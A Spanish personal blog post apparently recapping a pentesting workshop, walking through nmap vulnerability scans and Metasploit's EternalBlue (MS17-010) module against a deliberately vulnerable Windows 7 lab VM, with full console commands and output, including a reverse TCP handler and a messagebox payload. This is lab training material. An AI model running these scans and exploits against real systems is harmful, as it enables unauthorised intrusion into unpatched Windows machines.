jejo.es (Em50L)

En menos de 50 líneas.

Pentesting: win7min

Publicado:
#aprendizaje#vpn
#hardening#pentesting

Repaso de lo aprendido en el taller de ‘#Pentesting4ever’
impartido en el congreso de Euskalhack.
Esta vez cojo una distro conocida como win7min que es vulnerable al eternalblue

Repaso de lo aprendido en el taller de ‘#Pentesting4ever’

impartido en el congreso de Seguridad informatica #Euskalhack.

1) Arranco la maquina a auditar w7min en virtualbox

Nota: le configuro la red como adaptador solo anfitrion.

La red de mis VM es 192.168.56.XX(este dato puede ser diferente en tu equipo (ip a |grep global))
Luego hago un nmap -sn 192.168.56.0/24 o nmap -sn 192.168.56.* a ver que sale:

em50l@jejo.es$ nmap -sn 192.168.56.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-06 22:25 CEST
Nmap scan report for medion (192.168.56.1)
Host is up (0.0029s latency).
Nmap scan report for 192.168.56.104
Host is up (0.00096s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.67 seconds
em50l@jejo.es$

bien. La ip es la 192.168.56.104

como es windows escaneo vulnerabilidades.

root@kali:~# nmap 192.168.56.101  -script *vuln*
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 18:05 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
MAC Address: 08:00:27:46:45:AF (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!

Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds
root@kali:~#

Busco Exploits:

root@kali:~# searchsploit CVE-2009-3103
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit 975497
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit cve2009-3103
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit cve2009
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit CVE-2017-0143
Exploits: No Result
Shellcodes: No Result
root@kali:~#





msf5 > nmap 192.168.56.104 -p 139,445 -script smb-vuln*
[*] exec: nmap 192.168.56.104 -p 139,445 -script smb-vuln*

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 16:22 EDT
Nmap scan report for 192.168.56.104
Host is up (0.0011s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
msf5 >
____ ### busco la primera vulnerabilidad. 
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 >

lanzo exploit/windows/smb/ms17_010_eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.56.104   yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 192.168.56.104:445 - Connecting to target for exploitation.
[+] 192.168.56.104:445 - Connection established for exploitation.
[+] 192.168.56.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.104:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.56.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.56.104:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.56.104:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.56.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.104:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.104:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.104:445 - Starting non-paged pool grooming
[+] 192.168.56.104:445 - Sending SMBv2 buffers
[+] 192.168.56.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.104:445 - Sending final SMBv2 buffers.
[*] 192.168.56.104:445 - Sending last fragment of exploit packet!
[*] 192.168.56.104:445 - Receiving response from exploit packet
[+] 192.168.56.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.104:445 - Sending egg to corrupted connection.
[*] 192.168.56.104:445 - Triggering free of corrupted buffer.

[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.104:445 - Connecting to target for exploitation.
[-] 192.168.56.104:445 - Rex::HostUnreachable: The host (192.168.56.104:445) was unreachable.
[*] Exploit completed, but no session was created.

Parece que por fin consigo algo.

la maquina se cae jaja……

probando otra vez.

esta vez con un payload mas simple un msgbox

msf5 >
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/messagebox
payload => windows/x64/messagebox
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options



Module options (exploit/windows/smb/ms17_010_eternalblue):



Name           Current Setting  Required  Description






RHOSTS         192.168.56.106   yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.



Payload options (windows/x64/messagebox):



Name      Current Setting   Required  Description






EXITFUNC  thread            yes       Exit technique (Accepted: '', seh, thread, process, none)
   ICON      NO                yes       Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION)
   TEXT      Hello, from MSF!  yes       Messagebox Text
   TITLE     MessageBox        yes       Messagebox Title



Exploit target:



Id  Name






0   Windows 7 and Server 2008 R2 (x64) All Service Packs



msf5 exploit(windows/smb/ms17_010_eternalblue) > run



[] 192.168.56.106:445 - Connecting to target for exploitation.
[+] 192.168.56.106:445 - Connection established for exploitation.
[+] 192.168.56.106:445 - Target OS selected valid for OS indicated by SMB reply
[] 192.168.56.106:445 - CORE raw buffer dump (38 bytes)
[] 192.168.56.106:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[] 192.168.56.106:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[] 192.168.56.106:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1

[+] 192.168.56.106:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 192.168.56.106:445 - Trying exploit with 12 Groom Allocations.
[] 192.168.56.106:445 - Sending all but last fragment of exploit packet
[] 192.168.56.106:445 - Starting non-paged pool grooming
[+] 192.168.56.106:445 - Sending SMBv2 buffers
[+] 192.168.56.106:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 192.168.56.106:445 - Sending final SMBv2 buffers.
[] 192.168.56.106:445 - Sending last fragment of exploit packet!
[] 192.168.56.106:445 - Receiving response from exploit packet
[+] 192.168.56.106:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 192.168.56.106:445 - Sending egg to corrupted connection.
[*] 192.168.56.106:445 - Triggering free of corrupted buffer.
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[
a la tercera parece que este payload mas sencillo se lo traga.